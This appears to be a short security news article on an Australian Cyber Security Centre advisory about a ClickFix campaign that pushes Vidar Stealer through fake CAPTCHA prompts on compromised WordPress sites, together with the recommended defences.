Australia’s cyber security agency has warned organizations about an ongoing ClickFix malware campaign that uses compromised WordPress websites to push Vidar Stealer to Australian infrastructure and other entities.
KEY FACTS
- Technique ClickFix relies on fake CAPTCHA or browser verification prompts to trick users into running malicious commands.
- Payload The campaign delivers Vidar Stealer, an info-stealing malware family that has been active since late 2018.
- Delivery Victims are redirected from compromised WordPress sites to prompts that instruct them to copy and run PowerShell commands.
- Defense The advisory recommends restricting PowerShell and using application allow-listing.
The Australian Cyber Security Center advisory said the Australian Signals Directorate’s cyber security arm has observed ClickFix-associated activity using WordPress-hosted infrastructure to distribute the malware.
In the attacks, users visiting compromised websites are shown a fake Cloudflare verification or CAPTCHA prompt. The prompt tells them to manually execute a malicious PowerShell command, which then leads to infection.
Vidar Stealer targets browser passwords, cookies, cryptocurrency wallets, autofill data and system details. The malware can delete its executable after launch and then run from memory, which can reduce forensic artifacts.
The advisory says the malware can retrieve command-and-control settings through dead-drop URLs that use public services such as Telegram bots and Steam profiles. It also advises WordPress administrators to install security updates for themes and add-ons and remove unused plugins and themes.
The disclosure includes indicators of compromise that organizations can use for detection and defense. The campaign shows how social engineering and compromised web infrastructure can combine to bypass normal protections.
WHY IT MATTERS
The campaign can expose credentials and wallet data if users are fooled into running the command. It also highlights the risk from WordPress sites that are not fully patched and from malware that is designed to leave fewer traces behind.